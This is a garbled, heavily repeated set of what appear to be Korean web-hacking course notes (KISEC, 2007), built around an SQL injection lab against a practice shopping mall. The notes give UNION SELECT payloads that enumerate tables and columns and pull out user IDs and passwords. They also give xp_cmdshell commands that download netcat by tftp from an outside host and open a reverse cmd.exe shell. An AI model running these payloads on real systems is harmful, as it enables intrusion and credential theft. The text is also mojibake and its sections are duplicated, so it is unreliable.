Members์ ๋ํ ์ปฌ๋ผ์ ํ ํด๋ธ๋ค
$ or 1=(select top 1 user_id from members)--
User id์ ์ปฌ๋ผ์ top 1 ์ธ๊ฒ์ ํ ํด๋ธ๋ค
union select 1234 user_idpasswd from members where user_id=oyes --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 18
์ผ์~password ๊ฐ oyesmall ์ด๋ผ๋ค ์ค์ต ๋
File Uploading
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --
$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --
์์ฃผ ๊ฐ๋จํ๋ค
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 19
Tracehead ๋ฑ์ ๋ํ ์์ดํ ์๋ต
๋ฐ์ดํฐ์์ด ์ ์กํ put์ ๋ํ์๋ต
Unexpercted Method ์ ์ก
๋์ผ์์ฒญ ๋ฐ๋ณต ์ ์ก
์ทจ์ฝ์ ์ค์บ(system)
Xscan
Nessus
n-stealth security scanner
์ทจ์ฝ์ ์ค์บ(Web Server amp WAS amp Web App)
APP SCANNER
ACUNETIX
NSTALKER SCANNER
์ค์บ ISSUE
BASIC DIGEST NTML CERT
FORM-BASED
์ธ์ฆ์ ๋ณด ์ค์
์ค์บ ๊ฐ๋(๋ฉํฐ ์ปค๋ฅ์ ํ์์์ ๊ณต๊ฒฉ๋ชจ๋๋น๊ณต๊ฒฉ๋ชจ๋)
๋ถ์
์๋ฏธ์๋ ์ ๋ณด๋ก ๊ฐ๊ณต
ACCOUNT ์์ง
OS์ ๋ณด์ ๋ฐ๋ฅธ ์ทจ์ฝ์ ์์ง
ํฌํธ๋ณ ์๋น์ค ์ทจ์ฝ์
์น์๋ฒ ์ ์ฒด๊ตฌ์กฐ ๋ถ์
์ฃผ์
ํ๋ ํ๋
์์ค๋ถ์
์ฟ ํค๋ถ์
์ธ์ ID์์ฑ ์ทจ์ฝ์ ๋ถ์
๊ณต๊ฒฉ
์ ๋ณด์ ๊ทบ๊ฑฐํ ๊ณต๊ฒฉ
๋ฌด์์ ๊ณต๊ฒฉ
์ฌ์ ๊ณต๊ฒฉ
๊ณต๊ฒฉ์ด์
์์ง๋ ACCOUNT ์ ๋ณด๋ฅผ์ด์ฉ
OSNETWORK SERVICE ๊ณต๊ฒฉ
WEBSERVER WEBAPP SERVER WEBAPPLICATION
SQLISCANNER
๊ถํ ์์น
์ํ
ํ์์ ๋ณด ์์
Cookie Stealing
CSRF
์์ง
CSRF
CSRF๋ฅผ ํตํด DMZ์์ญ์ ์ ์ํ ๊ด๋ฆฌ์์๊ฒ ๋ด๋ถ ZONE์ชฝ์ผ๋ก ๊ฐ์ REQEUST๋ฅผ ํ๋๋ก ์กฐ์ ๊ฐ๋ฅ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 13
์ ์ ์กฐ๊ฑด์ ๋ด๋ถ๋ง์ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋ ์๊ณ ์์ ๊ฒฝ์ฐ
CSRF๋ฅผ ํตํด DMZ์์ญ์ ์ ์ํ ๊ด๋ฆฌ์์๊ฒ ๋ด๋ถ ZONE์ชฝ์ผ๋ก ๊ฐ์ REQEUST๋ฅผ ํ๋๋ก ์กฐ์ ๊ฐ๋ฅ
OWASPWASC
์์์
์น ์ดํ๋ฆฌ์ผ์ด์ ์ทจ์ฝ์ ๊ณต๊ฒฉ
์ํ๋์ ๋ฐ๋ผ ๊ณต๊ฒฉ
๊ฐ์ฉ์ฑ์ ๋จ์ดํธ๋ฆฌ๋ ๊ณต๊ฒฉ์ ์ธ
์๋ฒ์ shellํ๋ or๊ด๋ฆฌ์ ์ํธ ํ๋
๋ฐ์ดํฐ ์ด๋ ํ์ฉ๊ธ์ง
Ethical Hacking์ธ ๊ฒฝ์ฐ ๊ณ ๊ฐ์ ์๊ตฌ์ฌํญ ๋ฐ์
์คํ์ ๊ฑฐ
์น ์ทจ์ฝ์ ์ค์บ๋ ๊ฒฐ๊ณผ ๋ถ์
ONE WAY WEB HACKING ์ฝ์ด๋ณด๊ธฐ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 14
SQL INJECTION
GETPOST ํ๋ผ๋ฏธํฐ HTTP REQUEST ํ๋ผ๋ฏธํฐ ์ฟ ํค ๊ฐ
๊ธฐํ ์๋ฒ์์ ์ฒ๋ฆฌํ๋ ๋ชจ๋ ํด๋ผ์ด์ถํธ ๊ฐ
ํด๋ผ์ด์ถํธ ์ ๋ ฅ ๊ฐ ์ ํ
ํด๋ผ์ด์ถํธ์์ ์ ๋ ฅ๋ ๊ฐ์ด ์ ํจ์ฑ ๊ฒ์ฆ๊ณผ์ ์์ด sql ๋ฌธ์ ํฌํจ๋๋ ๊ฒฝ์ฐ
MAIN CAUSE
Impact
์ธ์ฆ์ฐํ
๋ฐ์ดํฐ๋ฒ ์ด์ค ๋คํ ์กฐ์ ์์ฑ ํ๊ดด
DML D์ด ๋ฑ ์์ํ ์ ์๋ ๋ชจ๋ ์์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ปจํธ๋กค
์์คํ ๋ช ๋ น์ด ์คํ
COUNTERMEASURE
์ ๋ ฅ๊ฐ ๊ฒ์ฆ
์ต์๊ถํ ๋ถ์ฌ(SYSTEMDBMSDatabase)
์ธ์ฆ์ฐํ
์ธ๊ฐ๋ ์ฌ์ฉ์์ ID PW ๋ฅผ ์ ๋ ฅํ์ง ์๊ณ ๋ ์ธ์ฆ์ ์ฐํํ๋ ํ์
ID PW๋ฅผ ๋ชจ๋ฅด๋ ์ํ์์๋ ์ ์ ํ ๊ตฌ์ฑ๋ ๋ฌธ์์ด์ ์ ๋ ฅํ์ฌ ์ธ์ฆ์ ์ฐํํ๋ ๊ฒ์ด ๊ฐ๋ฅ
์ ๋ ฅ๋ ๋ฌธ์์ด์ SQL ๋ฌธ์ ์ผ๋ถ๋ก ์ฝ์ ์ด ๋์ด ์คํ๋จ
์ธ์ฆ ์ฐํ์ ์ฌ์ฉ๋๋ ์ ๋ ฅ๊ฐ์
๋ฌธ๋ฒ์ ์ค๋ฅ๋ฅผ ์ํค์ง ์์์ผ ํจ
WHERE์ ์ ์กฐ๊ฑด์ด ํญ์ ์ฐธ์ด ๋๋๋ก ์กฐ์
์น ์ ํ๋ฆฌ์ผ์ด์ ์ ์ผ๋ฐ์ ์ธ ์ธ์ฆ ์ ์ฐจ
1IDPW ์ ๋ ฅ
2SQL Query ์์ฑ
3DATABASE์ ์ฟผ๋ฆฌ ์ ์ก
4DATABASE์์ ์ฟผ๋ฆฌ๋ฌธ ์คํ
5๋ฐํ๋๋ RETURN๊ฐ์ ๋ฐ๋ผ ์ธ์ฆ์ฌ๋ถํ๋จ
SQL INJECTION ์ ์ฐจ
DB ์คํค๋งํ์ (DBTABLECOLUMN ํ๊ฒฝ์ ๋ณด๋ฑ ํ์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ด๋ฆ ํ์
ํ ์ด๋ธ์ด๋ฆ ํ์
์ปฌ๋ผ์ด๋ฆ ํ์
๋ชจ๋ SQL INJECTION์ ์ ๋ ฅ๊ฐ์ ๋ํ ์ ํจ์ฑ ๊ฒ์ฆ์ ํ์ง ์๊ธฐ ๋๋ฌธ์ ๋ฐ์ํ๋ค ์๋ฌ๋ฅผ ์ ๋ํ์ฌ ํ๋์ ์ ๋ณด๋ฅผ ๋์ถ์ํจ๋ค
DBMS ๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ๋ ์ง์คํธ๋ฆฌ์ ์ ๊ทบํ๋ ๊ฒ์ด ๊ฐ๋ฅ
DBMS๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ์ฟผ๋ฆฌ๋ฅผ ํตํ ์๋น์ค ์ ์ด๊ฐ ๊ฐ๋ฅ
OYES MALL (SQL INJECTION์ ์ด์ฉํ ๊ด๋ฆฌ์ ๊ถํ ํ๋ ์ค์ต
ํ๊ฒฝ์(2000ASPMS-SQL2000)
์ค๋น๋ ์ผํ๋ชฐ์ด๋ค
์ฒซ๋ฒ์งธ ๋ฐฉ๋ฒ
Web Hacking 3์ผ์ฐจ
2007๋ 10์ 25์ผ ๋ชฉ์์ผ
์ค์ 1200
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 15
group by(user_id) -- ๋ฅผ ์ด์ฉํด ํ ์ด๋ธ์ ์์๋ธ๋ค
Member ํ ์ด๋ธ์์์๋ num์ด๋ผ๋ ์ปฌ๋ผ์ ํ ํด๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 16
union select from members where user_id like o ํด๋ด๋ผ ๋ก๊ทธ์ธ ๋ ๊ฑฐ๋ค
๋๋ฒ์งธ ๋ฐฉ๋ฒ
์ฃผ์๋ก์กฐํ ๋ถ๋ถ์ SQL INJECTION์ ํ์๋ค
$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์๊ฐ์ด ์ง์๋ฅผ ํ๋ฉด ํ ํด๋ธ๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 17
์ฐ๋ฆฌ๋ members ๋ผ๋ ํ ์ด๋ธ์ด ์กด์ฌํ๋ ๊ฒ์ ๋ณผ์ ์์ ๊ฒ์ด๋ค
$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --
Members์ ๋ํ ์ปฌ๋ผ์ ํ ํด๋ธ๋ค
$ or 1=(select top 1 user_id from members)--
User id์ ์ปฌ๋ผ์ top 1 ์ธ๊ฒ์ ํ ํด๋ธ๋ค
union select 1234 user_idpasswd from members where user_id=oyes --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 18
์ผ์~password ๊ฐ oyesmall ์ด๋ผ๋ค ์ค์ต ๋
File Uploading
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --
$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --
์์ฃผ ๊ฐ๋จํ๋ค
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 19
์ ์ ์กฐ๊ฑด์ ๋ด๋ถ๋ง์ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋ ์๊ณ ์์ ๊ฒฝ์ฐ
CSRF๋ฅผ ํตํด DMZ์์ญ์ ์ ์ํ ๊ด๋ฆฌ์์๊ฒ ๋ด๋ถ ZONE์ชฝ์ผ๋ก ๊ฐ์ REQEUST๋ฅผ ํ๋๋ก ์กฐ์ ๊ฐ๋ฅ
OWASPWASC
์์์
์น ์ดํ๋ฆฌ์ผ์ด์ ์ทจ์ฝ์ ๊ณต๊ฒฉ
์ํ๋์ ๋ฐ๋ผ ๊ณต๊ฒฉ
๊ฐ์ฉ์ฑ์ ๋จ์ดํธ๋ฆฌ๋ ๊ณต๊ฒฉ์ ์ธ
์๋ฒ์ shellํ๋ or๊ด๋ฆฌ์ ์ํธ ํ๋
๋ฐ์ดํฐ ์ด๋ ํ์ฉ๊ธ์ง
Ethical Hacking์ธ ๊ฒฝ์ฐ ๊ณ ๊ฐ์ ์๊ตฌ์ฌํญ ๋ฐ์
์คํ์ ๊ฑฐ
์น ์ทจ์ฝ์ ์ค์บ๋ ๊ฒฐ๊ณผ ๋ถ์
ONE WAY WEB HACKING ์ฝ์ด๋ณด๊ธฐ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 14
SQL INJECTION
GETPOST ํ๋ผ๋ฏธํฐ HTTP REQUEST ํ๋ผ๋ฏธํฐ ์ฟ ํค ๊ฐ
๊ธฐํ ์๋ฒ์์ ์ฒ๋ฆฌํ๋ ๋ชจ๋ ํด๋ผ์ด์ถํธ ๊ฐ
ํด๋ผ์ด์ถํธ ์ ๋ ฅ ๊ฐ ์ ํ
ํด๋ผ์ด์ถํธ์์ ์ ๋ ฅ๋ ๊ฐ์ด ์ ํจ์ฑ ๊ฒ์ฆ๊ณผ์ ์์ด sql ๋ฌธ์ ํฌํจ๋๋ ๊ฒฝ์ฐ
MAIN CAUSE
Impact
์ธ์ฆ์ฐํ
๋ฐ์ดํฐ๋ฒ ์ด์ค ๋คํ ์กฐ์ ์์ฑ ํ๊ดด
DML D์ด ๋ฑ ์์ํ ์ ์๋ ๋ชจ๋ ์์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ปจํธ๋กค
์์คํ ๋ช ๋ น์ด ์คํ
COUNTERMEASURE
์ ๋ ฅ๊ฐ ๊ฒ์ฆ
์ต์๊ถํ ๋ถ์ฌ(SYSTEMDBMSDatabase)
์ธ์ฆ์ฐํ
์ธ๊ฐ๋ ์ฌ์ฉ์์ ID PW ๋ฅผ ์ ๋ ฅํ์ง ์๊ณ ๋ ์ธ์ฆ์ ์ฐํํ๋ ํ์
ID PW๋ฅผ ๋ชจ๋ฅด๋ ์ํ์์๋ ์ ์ ํ ๊ตฌ์ฑ๋ ๋ฌธ์์ด์ ์ ๋ ฅํ์ฌ ์ธ์ฆ์ ์ฐํํ๋ ๊ฒ์ด ๊ฐ๋ฅ
์ ๋ ฅ๋ ๋ฌธ์์ด์ SQL ๋ฌธ์ ์ผ๋ถ๋ก ์ฝ์ ์ด ๋์ด ์คํ๋จ
์ธ์ฆ ์ฐํ์ ์ฌ์ฉ๋๋ ์ ๋ ฅ๊ฐ์
๋ฌธ๋ฒ์ ์ค๋ฅ๋ฅผ ์ํค์ง ์์์ผ ํจ
WHERE์ ์ ์กฐ๊ฑด์ด ํญ์ ์ฐธ์ด ๋๋๋ก ์กฐ์
์น ์ ํ๋ฆฌ์ผ์ด์ ์ ์ผ๋ฐ์ ์ธ ์ธ์ฆ ์ ์ฐจ
1IDPW ์ ๋ ฅ
2SQL Query ์์ฑ
3DATABASE์ ์ฟผ๋ฆฌ ์ ์ก
4DATABASE์์ ์ฟผ๋ฆฌ๋ฌธ ์คํ
5๋ฐํ๋๋ RETURN๊ฐ์ ๋ฐ๋ผ ์ธ์ฆ์ฌ๋ถํ๋จ
SQL INJECTION ์ ์ฐจ
DB ์คํค๋งํ์ (DBTABLECOLUMN ํ๊ฒฝ์ ๋ณด๋ฑ ํ์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ด๋ฆ ํ์
ํ ์ด๋ธ์ด๋ฆ ํ์
์ปฌ๋ผ์ด๋ฆ ํ์
๋ชจ๋ SQL INJECTION์ ์ ๋ ฅ๊ฐ์ ๋ํ ์ ํจ์ฑ ๊ฒ์ฆ์ ํ์ง ์๊ธฐ ๋๋ฌธ์ ๋ฐ์ํ๋ค ์๋ฌ๋ฅผ ์ ๋ํ์ฌ ํ๋์ ์ ๋ณด๋ฅผ ๋์ถ์ํจ๋ค
DBMS ๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ๋ ์ง์คํธ๋ฆฌ์ ์ ๊ทบํ๋ ๊ฒ์ด ๊ฐ๋ฅ
DBMS๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ์ฟผ๋ฆฌ๋ฅผ ํตํ ์๋น์ค ์ ์ด๊ฐ ๊ฐ๋ฅ
OYES MALL (SQL INJECTION์ ์ด์ฉํ ๊ด๋ฆฌ์ ๊ถํ ํ๋ ์ค์ต
ํ๊ฒฝ์(2000ASPMS-SQL2000)
์ค๋น๋ ์ผํ๋ชฐ์ด๋ค
์ฒซ๋ฒ์งธ ๋ฐฉ๋ฒ
Web Hacking 3์ผ์ฐจ
2007๋ 10์ 25์ผ ๋ชฉ์์ผ
์ค์ 1200
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 15
group by(user_id) -- ๋ฅผ ์ด์ฉํด ํ ์ด๋ธ์ ์์๋ธ๋ค
Member ํ ์ด๋ธ์์์๋ num์ด๋ผ๋ ์ปฌ๋ผ์ ํ ํด๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 16
union select from members where user_id like o ํด๋ด๋ผ ๋ก๊ทธ์ธ ๋ ๊ฑฐ๋ค
๋๋ฒ์งธ ๋ฐฉ๋ฒ
์ฃผ์๋ก์กฐํ ๋ถ๋ถ์ SQL INJECTION์ ํ์๋ค
$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์๊ฐ์ด ์ง์๋ฅผ ํ๋ฉด ํ ํด๋ธ๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 17
์ฐ๋ฆฌ๋ members ๋ผ๋ ํ ์ด๋ธ์ด ์กด์ฌํ๋ ๊ฒ์ ๋ณผ์ ์์ ๊ฒ์ด๋ค
$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --
Members์ ๋ํ ์ปฌ๋ผ์ ํ ํด๋ธ๋ค
$ or 1=(select top 1 user_id from members)--
User id์ ์ปฌ๋ผ์ top 1 ์ธ๊ฒ์ ํ ํด๋ธ๋ค
union select 1234 user_idpasswd from members where user_id=oyes --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 18
์ผ์~password ๊ฐ oyesmall ์ด๋ผ๋ค ์ค์ต ๋
File Uploading
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --
$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --
์์ฃผ ๊ฐ๋จํ๋ค
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 19
SQL INJECTION
GETPOST ํ๋ผ๋ฏธํฐ HTTP REQUEST ํ๋ผ๋ฏธํฐ ์ฟ ํค ๊ฐ
๊ธฐํ ์๋ฒ์์ ์ฒ๋ฆฌํ๋ ๋ชจ๋ ํด๋ผ์ด์ถํธ ๊ฐ
ํด๋ผ์ด์ถํธ ์ ๋ ฅ ๊ฐ ์ ํ
ํด๋ผ์ด์ถํธ์์ ์ ๋ ฅ๋ ๊ฐ์ด ์ ํจ์ฑ ๊ฒ์ฆ๊ณผ์ ์์ด sql ๋ฌธ์ ํฌํจ๋๋ ๊ฒฝ์ฐ
MAIN CAUSE
Impact
์ธ์ฆ์ฐํ
๋ฐ์ดํฐ๋ฒ ์ด์ค ๋คํ ์กฐ์ ์์ฑ ํ๊ดด
DML D์ด ๋ฑ ์์ํ ์ ์๋ ๋ชจ๋ ์์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ปจํธ๋กค
์์คํ ๋ช ๋ น์ด ์คํ
COUNTERMEASURE
์ ๋ ฅ๊ฐ ๊ฒ์ฆ
์ต์๊ถํ ๋ถ์ฌ(SYSTEMDBMSDatabase)
์ธ์ฆ์ฐํ
์ธ๊ฐ๋ ์ฌ์ฉ์์ ID PW ๋ฅผ ์ ๋ ฅํ์ง ์๊ณ ๋ ์ธ์ฆ์ ์ฐํํ๋ ํ์
ID PW๋ฅผ ๋ชจ๋ฅด๋ ์ํ์์๋ ์ ์ ํ ๊ตฌ์ฑ๋ ๋ฌธ์์ด์ ์ ๋ ฅํ์ฌ ์ธ์ฆ์ ์ฐํํ๋ ๊ฒ์ด ๊ฐ๋ฅ
์ ๋ ฅ๋ ๋ฌธ์์ด์ SQL ๋ฌธ์ ์ผ๋ถ๋ก ์ฝ์ ์ด ๋์ด ์คํ๋จ
์ธ์ฆ ์ฐํ์ ์ฌ์ฉ๋๋ ์ ๋ ฅ๊ฐ์
๋ฌธ๋ฒ์ ์ค๋ฅ๋ฅผ ์ํค์ง ์์์ผ ํจ
WHERE์ ์ ์กฐ๊ฑด์ด ํญ์ ์ฐธ์ด ๋๋๋ก ์กฐ์
์น ์ ํ๋ฆฌ์ผ์ด์ ์ ์ผ๋ฐ์ ์ธ ์ธ์ฆ ์ ์ฐจ
1IDPW ์ ๋ ฅ
2SQL Query ์์ฑ
3DATABASE์ ์ฟผ๋ฆฌ ์ ์ก
4DATABASE์์ ์ฟผ๋ฆฌ๋ฌธ ์คํ
5๋ฐํ๋๋ RETURN๊ฐ์ ๋ฐ๋ผ ์ธ์ฆ์ฌ๋ถํ๋จ
SQL INJECTION ์ ์ฐจ
DB ์คํค๋งํ์ (DBTABLECOLUMN ํ๊ฒฝ์ ๋ณด๋ฑ ํ์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ด๋ฆ ํ์
ํ ์ด๋ธ์ด๋ฆ ํ์
์ปฌ๋ผ์ด๋ฆ ํ์
๋ชจ๋ SQL INJECTION์ ์ ๋ ฅ๊ฐ์ ๋ํ ์ ํจ์ฑ ๊ฒ์ฆ์ ํ์ง ์๊ธฐ ๋๋ฌธ์ ๋ฐ์ํ๋ค ์๋ฌ๋ฅผ ์ ๋ํ์ฌ ํ๋์ ์ ๋ณด๋ฅผ ๋์ถ์ํจ๋ค
DBMS ๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ๋ ์ง์คํธ๋ฆฌ์ ์ ๊ทบํ๋ ๊ฒ์ด ๊ฐ๋ฅ
DBMS๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ์ฟผ๋ฆฌ๋ฅผ ํตํ ์๋น์ค ์ ์ด๊ฐ ๊ฐ๋ฅ
OYES MALL (SQL INJECTION์ ์ด์ฉํ ๊ด๋ฆฌ์ ๊ถํ ํ๋ ์ค์ต
ํ๊ฒฝ์(2000ASPMS-SQL2000)
์ค๋น๋ ์ผํ๋ชฐ์ด๋ค
์ฒซ๋ฒ์งธ ๋ฐฉ๋ฒ
Web Hacking 3์ผ์ฐจ
2007๋ 10์ 25์ผ ๋ชฉ์์ผ
์ค์ 1200
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 15
group by(user_id) -- ๋ฅผ ์ด์ฉํด ํ ์ด๋ธ์ ์์๋ธ๋ค
Member ํ ์ด๋ธ์์์๋ num์ด๋ผ๋ ์ปฌ๋ผ์ ํ ํด๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 16
union select from members where user_id like o ํด๋ด๋ผ ๋ก๊ทธ์ธ ๋ ๊ฑฐ๋ค
๋๋ฒ์งธ ๋ฐฉ๋ฒ
์ฃผ์๋ก์กฐํ ๋ถ๋ถ์ SQL INJECTION์ ํ์๋ค
$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์๊ฐ์ด ์ง์๋ฅผ ํ๋ฉด ํ ํด๋ธ๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 17
์ฐ๋ฆฌ๋ members ๋ผ๋ ํ ์ด๋ธ์ด ์กด์ฌํ๋ ๊ฒ์ ๋ณผ์ ์์ ๊ฒ์ด๋ค
$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --
Members์ ๋ํ ์ปฌ๋ผ์ ํ ํด๋ธ๋ค
$ or 1=(select top 1 user_id from members)--
User id์ ์ปฌ๋ผ์ top 1 ์ธ๊ฒ์ ํ ํด๋ธ๋ค
union select 1234 user_idpasswd from members where user_id=oyes --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 18
์ผ์~password ๊ฐ oyesmall ์ด๋ผ๋ค ์ค์ต ๋
File Uploading
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --
$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --
์์ฃผ ๊ฐ๋จํ๋ค
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 19
group by(user_id) -- ๋ฅผ ์ด์ฉํด ํ ์ด๋ธ์ ์์๋ธ๋ค
Member ํ ์ด๋ธ์์์๋ num์ด๋ผ๋ ์ปฌ๋ผ์ ํ ํด๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 16
union select from members where user_id like o ํด๋ด๋ผ ๋ก๊ทธ์ธ ๋ ๊ฑฐ๋ค
๋๋ฒ์งธ ๋ฐฉ๋ฒ
์ฃผ์๋ก์กฐํ ๋ถ๋ถ์ SQL INJECTION์ ํ์๋ค
$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์๊ฐ์ด ์ง์๋ฅผ ํ๋ฉด ํ ํด๋ธ๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 17
์ฐ๋ฆฌ๋ members ๋ผ๋ ํ ์ด๋ธ์ด ์กด์ฌํ๋ ๊ฒ์ ๋ณผ์ ์์ ๊ฒ์ด๋ค
$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --
Members์ ๋ํ ์ปฌ๋ผ์ ํ ํด๋ธ๋ค
$ or 1=(select top 1 user_id from members)--
User id์ ์ปฌ๋ผ์ top 1 ์ธ๊ฒ์ ํ ํด๋ธ๋ค
union select 1234 user_idpasswd from members where user_id=oyes --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 18
์ผ์~password ๊ฐ oyesmall ์ด๋ผ๋ค ์ค์ต ๋
File Uploading
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --
$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --
์์ฃผ ๊ฐ๋จํ๋ค
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 19
union select from members where user_id like o ํด๋ด๋ผ ๋ก๊ทธ์ธ ๋ ๊ฑฐ๋ค
๋๋ฒ์งธ ๋ฐฉ๋ฒ
์ฃผ์๋ก์กฐํ ๋ถ๋ถ์ SQL INJECTION์ ํ์๋ค
$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์๊ฐ์ด ์ง์๋ฅผ ํ๋ฉด ํ ํด๋ธ๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 17
์ฐ๋ฆฌ๋ members ๋ผ๋ ํ ์ด๋ธ์ด ์กด์ฌํ๋ ๊ฒ์ ๋ณผ์ ์์ ๊ฒ์ด๋ค
$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --
Members์ ๋ํ ์ปฌ๋ผ์ ํ ํด๋ธ๋ค
$ or 1=(select top 1 user_id from members)--
User id์ ์ปฌ๋ผ์ top 1 ์ธ๊ฒ์ ํ ํด๋ธ๋ค
union select 1234 user_idpasswd from members where user_id=oyes --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 18
์ผ์~password ๊ฐ oyesmall ์ด๋ผ๋ค ์ค์ต ๋
File Uploading
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --
$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --
์์ฃผ ๊ฐ๋จํ๋ค
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 19
์ฐ๋ฆฌ๋ members ๋ผ๋ ํ ์ด๋ธ์ด ์กด์ฌํ๋ ๊ฒ์ ๋ณผ์ ์์ ๊ฒ์ด๋ค
$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --
Members์ ๋ํ ์ปฌ๋ผ์ ํ ํด๋ธ๋ค
$ or 1=(select top 1 user_id from members)--
User id์ ์ปฌ๋ผ์ top 1 ์ธ๊ฒ์ ํ ํด๋ธ๋ค
union select 1234 user_idpasswd from members where user_id=oyes --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 18
์ผ์~password ๊ฐ oyesmall ์ด๋ผ๋ค ์ค์ต ๋
File Uploading
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --
$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --
์์ฃผ ๊ฐ๋จํ๋ค
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 19
์ผ์~password ๊ฐ oyesmall ์ด๋ผ๋ค ์ค์ต ๋
File Uploading
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --
$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --
์์ฃผ ๊ฐ๋จํ๋ค
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 19